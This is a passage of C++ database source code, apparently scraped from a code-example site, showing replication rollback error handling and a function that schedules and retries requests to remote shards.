                      << "; expected to be in state " << MemberState(MemberState::RS_ROLLBACK)
                      << " but found self in " << _replCoord->getMemberState();
        }
        return;
    }
    if (ErrorCodes::UnrecoverableRollbackError == status.code()) {
        fassertNoTrace(28723, status);
    }
    warning() << "rollback cannot proceed at this time (retrying later): " << redact(status);
}
Пример #30
0
void AsyncRequestsSender::_scheduleRequests() {
    invariant(!_stopRetrying);
    // Schedule remote work on hosts for which we have not sent a request or need to retry.
    for (size_t i = 0; i < _remotes.size(); ++i) {
        auto& remote = _remotes[i];

        // First check if the remote had a retriable error, and if so, clear its response field so
        // it will be retried.
        if (remote.swResponse && !remote.done) {
            // We check both the response status and command status for a retriable error.
            Status status = remote.swResponse->getStatus();
            if (status.isOK()) {
                status = getStatusFromCommandResult(remote.swResponse->getValue().data);
            }

            if (status.isOK()) {
                status = getWriteConcernStatusFromCommandResult(remote.swResponse->getValue().data);
            }

            if (!status.isOK()) {
                // There was an error with either the response or the command.
                auto shard = remote.getShard();
                if (!shard) {
                    remote.swResponse =
                        Status(ErrorCodes::ShardNotFound,
                               str::stream() << "Could not find shard " << remote.shardId);
                } else {
                    if (remote.shardHostAndPort) {
                        shard->updateReplSetMonitor(*remote.shardHostAndPort, status);
                    }
                    if (shard->isRetriableError(status.code(), _retryPolicy) &&
                        remote.retryCount < kMaxNumFailedHostRetryAttempts) {
                        LOG(1) << "Command to remote " << remote.shardId << " at host "
                               << *remote.shardHostAndPort
                               << " failed with retriable error and will be retried "
                               << causedBy(redact(status));
                        ++remote.retryCount;
                        remote.swResponse.reset();
                    }
                }
            }
        }

        // If the remote does not have a response or pending request, schedule remote work for it.
        if (!remote.swResponse && !remote.cbHandle.isValid()) {
            auto scheduleStatus = _scheduleRequest(i);
            if (!scheduleStatus.isOK()) {
                remote.swResponse = std::move(scheduleStatus);

                // Push a noop response to the queue to indicate that a remote is ready for
                // re-processing due to failure.
                _responseQueue.producer.push(boost::none);
            }
        }
    }
}